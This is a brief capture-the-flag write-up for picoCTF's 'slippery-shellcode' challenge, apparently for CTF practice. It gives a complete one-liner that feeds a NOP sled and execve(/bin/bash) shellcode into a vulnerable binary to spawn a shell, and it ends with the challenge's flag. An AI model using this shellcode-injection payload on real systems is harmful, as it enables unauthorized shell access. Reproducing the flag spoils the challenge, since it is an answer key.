slippery-shellcode

Problem

This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_5_5cea4ae04c57923484bda350da9f4015 on the shell server. Source.

• Program

• Source

Solution

1. Get some quality shellcode from ShellStorm

2. I used Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes by Jonathan Salwan at http://shell-storm.org/shellcode/files/shellcode-606.php

3. The buffer is 512 bytes so buffer_size-payload_size=no_op_sled_size: 512-33=479

4. Create payload

(python2 -c "print '\x90'*479 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'" ; cat) | ./vuln

1. Run cat flag.txt

Flag

picoCTF{sl1pp3ry_sh311c0d3_ecc37b22}